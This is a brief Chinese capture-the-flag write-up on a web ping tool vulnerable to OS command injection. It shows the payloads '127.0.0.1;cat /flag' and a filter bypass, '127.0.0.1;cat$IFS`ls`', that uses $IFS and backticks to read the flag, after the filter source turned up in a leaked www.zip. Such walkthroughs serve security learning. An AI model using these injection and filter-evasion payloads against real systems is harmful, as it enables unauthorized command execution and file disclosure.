思路

这里输入 127.0.0.1 时,输出

PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.033 ms
64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.064 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.033/0.048/0.064 ms

系统检测到该设备处于在线状态

尝试命令执行 127.0.0.1;cat /flag ,输出

127.0.0.1;catflag意图不明,检查输入

继续尝试,发现很多特殊字符被替换为空,对网站进行扫描,发现有 www.zip 文件泄露,下载后获得过滤的源码

flag中每个字符也被过滤,最终采用

127.0.0.1;cat$IFS`ls`

即可绕过,查看页面源码就可以看到 flag,也可以尝试其它办法